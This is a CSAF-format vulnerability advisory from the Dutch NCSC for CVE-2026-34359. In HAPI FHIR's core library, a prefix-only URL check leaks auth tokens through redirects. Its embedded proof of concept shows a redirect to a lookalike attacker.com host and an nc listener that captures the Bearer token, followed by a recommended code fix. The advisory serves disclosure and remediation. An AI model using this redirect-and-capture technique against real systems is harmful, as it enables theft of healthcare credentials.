{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-34359", "tracking": { "current_release_date": "2026-04-03T14:32:26.786727Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-34359", "initial_release_date": "2026-03-30T17:42:03.666392Z", "revision_history": [ { "date": "2026-03-30T17:42:03.666392Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-30T17:42:12.366105Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-31T17:25:35.529163Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-31T17:25:40.087430Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-31T17:38:59.517894Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-31T17:39:02.742654Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-31T19:39:16.904804Z", "number": "7", "summary": "Unknown change." }, { "date": "2026-03-31T19:55:20.148100Z", "number": "8", "summary": "References created (1)." }, { "date": "2026-04-01T15:12:57.563616Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-04-01T15:13:02.154598Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-04-03T14:26:34.017870Z", "number": "11", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-04-03T14:26:36.017772Z", "number": "12", "summary": "NCSC Score updated." } ], "status": "interim", "version": "12" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<6.9.4", "product": { "name": "vers:unknown/<6.9.4", "product_id": "CSAFPID-5991910", "product_identification_helper": { "cpe": "cpe:2.3:a:hapifhir:hl7_fhir_core:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "HL7 FHIR Core" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<6.9.4", "product": { "name": "vers:unknown/<6.9.4", "product_id": "CSAFPID-5969376" } } ], "category": "product_name", "name": "org.hl7.fhir.core" } ], "category": "vendor", "name": "HAPI FHIR" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-34359", "cwe": { "id": "CWE-346", "name": "Origin Validation Error" }, "notes": [ { "category": "description", "text": "## Summary\n\n`ManagedWebAccessUtils.getServer()` uses `String.startsWith()` to match request URLs against configured server URLs for authentication credential dispatch. Because configured server URLs (e.g., `http://tx.fhir.org`) lack a trailing slash or host boundary check, an attacker-controlled domain like `http://tx.fhir.org.attacker.com` matches the prefix and receives Bearer tokens, Basic auth credentials, or API keys when the HTTP client follows a redirect to that domain.\n\n## Details\n\nThe root cause is in `ManagedWebAccessUtils.getServer()` at `org.hl7.fhir.utilities/src/main/java/org/hl7/fhir/utilities/http/ManagedWebAccessUtils.java:26`:\n\n```java\npublic static ServerDetailsPOJO getServer(String url, Iterable serverAuthDetails) {\n if (serverAuthDetails != null) {\n for (ServerDetailsPOJO serverDetails : serverAuthDetails) {\n if (url.startsWith(serverDetails.getUrl())) { // <-- no host boundary check\n return serverDetails;\n }\n }\n }\n return null;\n}\n```\n\nThe configured production terminology server URL is defined without a trailing slash in `FhirSettingsPOJO.java:19`:\n\n```java\nprotected static final String TX_SERVER_PROD = \"http://tx.fhir.org\";\n```\n\nThis means:\n- `\"http://tx.fhir.org.attacker.com/capture\".startsWith(\"http://tx.fhir.org\")` → **true**\n- `\"http://tx.fhir.org:8080/evil\".startsWith(\"http://tx.fhir.org\")` → **true**\n\n**Exploit chain via SimpleHTTPClient (redirect path):**\n\n1. `SimpleHTTPClient.get()` (`SimpleHTTPClient.java:68-105`) makes a request to `http://tx.fhir.org/ValueSet/$expand`\n2. On each redirect, the loop calls `getHttpGetConnection(url, accept)` (line 84) → `setHeaders(connection)` (line 117)\n3. `setHeaders()` (line 122-133) calls `authProvider.canProvideHeaders(url)` and `authProvider.getHeaders(url)` on the **redirect target URL**\n4. `ServerDetailsPOJOHTTPAuthProvider.getServerDetails()` (line 83-84) delegates to `ManagedWebAccessUtils.getServer(url.toString(), servers)`\n5. The `startsWith()` check matches `http://tx.fhir.org.attacker.com` against `http://tx.fhir.org`\n6. Credentials are dispatched to the attacker's server via `ServerDetailsPOJOHTTPAuthProvider.getHeaders()` (lines 38-58):\n - Bearer tokens: `Authorization: Bearer {token}`\n - Basic auth: `Authorization: Basic {base64(user:pass)}`\n - API keys: `Api-Key: {apikey}`\n - Custom headers from server config\n\nNote: An earlier fix (commit `6b615880` \"Strip headers on redirect\") added an `isNotSameHost()` check, but this was **removed** in commit `3871cc69` (\"Rework authorization providers in ManagedWebAccess\"). The current code on master has no host validation during redirect following.\n\n**Exploit chain via ManagedFhirWebAccessor (OkHttp path):**\n\n`ManagedFhirWebAccessor.httpCall()` (line 81-112) sets auth headers via `requestWithAuthorizationHeaders()` before passing the request to OkHttpClient. OkHttpClient follows redirects by default (up to 20) and carries the pre-set auth headers to all redirect targets. The same `startsWith()` check in `canProvideHeaders()` applies.\n\nThe same vulnerable pattern also exists in `ManagedWebAccess.isLocal()` (line 214), where `url.startsWith(server.getUrl())` is used to determine whether HTTP (non-TLS) access is allowed, potentially enabling TLS downgrade for attacker-controlled domains that match the prefix.\n\n## PoC\n\n**Step 1: Verify the prefix match behavior**\n\n```java\n// This demonstrates the core vulnerability\nString configuredUrl = \"http://tx.fhir.org\"; // FhirSettingsPOJO.TX_SERVER_PROD\nString attackerUrl = \"http://tx.fhir.org.attacker.com/capture\";\n\nSystem.out.println(attackerUrl.startsWith(configuredUrl));\n// Output: true\n```\n\n**Step 2: Demonstrate credential dispatch to wrong host**\n\nGiven a `fhir-settings.json` configuration at `~/.fhir/fhir-settings.json`:\n```json\n{\n \"servers\": [\n {\n \"url\": \"http://tx.fhir.org\",\n \"authenticationType\": \"token\",\n \"token\": \"secret-bearer-token-12345\"\n }\n ]\n}\n```\n\nWhen `SimpleHTTPClient.get(\"http://tx.fhir.org/ValueSet/$expand\")` follows a 302 redirect to `http://tx.fhir.org.attacker.com/capture`:\n\n1. `setHeaders()` is called with the redirect target URL\n2. `authProvider.canProvideHeaders(new URL(\"http://tx.fhir.org.attacker.com/capture\"))` returns `true`\n3. `authProvider.getHeaders(...)` returns `{\"Authorization\": \"Bearer secret-bearer-token-12345\"}`\n4. The `Authorization` header with the secret token is sent to `tx.fhir.org.attacker.com`\n\n**Step 3: Attacker captures the credential**\n\n```bash\n# On attacker-controlled server (tx.fhir.org.attacker.com)\nnc -l -p 80 | head -20\n# Output includes:\n# GET /capture HTTP/1.1\n# Host: tx.fhir.org.attacker.com\n# Authorization: Bearer secret-bearer-token-12345\n```\n\n## Impact\n\n- **Credential theft**: Bearer tokens, Basic authentication passwords, API keys, and custom authentication headers configured for FHIR terminology servers can be exfiltrated by an attacker who can inject a redirect (via MITM, compromised CDN, or DNS poisoning).\n- **Impersonation**: Stolen credentials allow an attacker to make authenticated requests to the legitimate FHIR server, potentially accessing or modifying clinical terminology data.\n- **Broad exposure**: The FHIR Validator is widely used in healthcare IT for validating FHIR resources. Any deployment that configures server authentication in `fhir-settings.json` and makes outbound HTTP requests to terminology servers is affected.\n- **TLS downgrade**: The same `startsWith()` pattern in `ManagedWebAccess.isLocal()` could allow an attacker-controlled domain to be treated as \"local,\" bypassing the HTTPS enforcement.\n\n## Recommended Fix\n\nReplace the `startsWith()` check in `ManagedWebAccessUtils.getServer()` with proper URL host boundary validation:\n\n```java\npublic static ServerDetailsPOJO getServer(String url, Iterable serverAuthDetails) {\n if (serverAuthDetails != null) {\n for (ServerDetailsPOJO serverDetails : serverAuthDetails) {\n if (urlMatchesServer(url, serverDetails.getUrl())) {\n return serverDetails;\n }\n }\n }\n return null;\n}\n\n/**\n * Check if a URL matches a configured server URL with proper host boundary validation.\n * After the configured prefix, the next character must be '/', '?', '#', ':', or end-of-string.\n */\nprivate static boolean urlMatchesServer(String url, String serverUrl) {\n if (url == null || serverUrl == null) return false;\n if (!url.startsWith(serverUrl)) return false;\n if (url.length() == serverUrl.length()) return true;\n char nextChar = url.charAt(serverUrl.length());\n return nextChar == '/' || nextChar == '?' || nextChar == '#' || nextChar == ':';\n}\n```\n\nApply the same fix to `ManagedWebAccess.isLocal()` at line 214 and the three-argument `getServer()` overload at line 14.\n\nAdditionally, consider re-introducing the host-equality check for redirects in `SimpleHTTPClient` (as was previously implemented in commit `6b615880` but removed in `3871cc69`) to provide defense-in-depth against credential leakage on cross-origin redirects.", "title": "github - https://api.github.com/advisories/GHSA-fgv2-4q4g-wc35" }, { "category": "description", "text": "HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.4, ManagedWebAccessUtils.getServer() uses String.startsWith() to match request URLs against configured server URLs for authentication credential dispatch. Because configured server URLs (e.g., http://tx.fhir.org) lack a trailing slash or host boundary check, an attacker-controlled domain like http://tx.fhir.org.attacker.com matches the prefix and receives Bearer tokens, Basic auth credentials, or API keys when the HTTP client follows a redirect to that domain. This issue has been patched in version 6.9.4.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34359" }, { "category": "description", "text": "HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.4, ManagedWebAccessUtils.getServer() uses String.startsWith() to match request URLs against configured server URLs for authentication credential dispatch. Because configured server URLs (e.g., http://tx.fhir.org) lack a trailing slash or host boundary check, an attacker-controlled domain like http://tx.fhir.org.attacker.com matches the prefix and receives Bearer tokens, Basic auth credentials, or API keys when the HTTP client follows a redirect to that domain. This issue has been patched in version 6.9.4.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34359.json" }, { "category": "other", "text": "0.00015", "title": "EPSS" }, { "category": "other", "text": "3.9", "title": "NCSC Score" }, { "category": "other", "text": "Is related to CWE-346 (Origin Validation Error)", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5969376", "CSAFPID-5991910" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-fgv2-4q4g-wc35" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34359" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34359.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-fgv2-4q4g-wc35" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-fgv2-4q4g-wc35" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34359" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5969376", "CSAFPID-5991910" ] } ], "title": "CVE-2026-34359" } ] }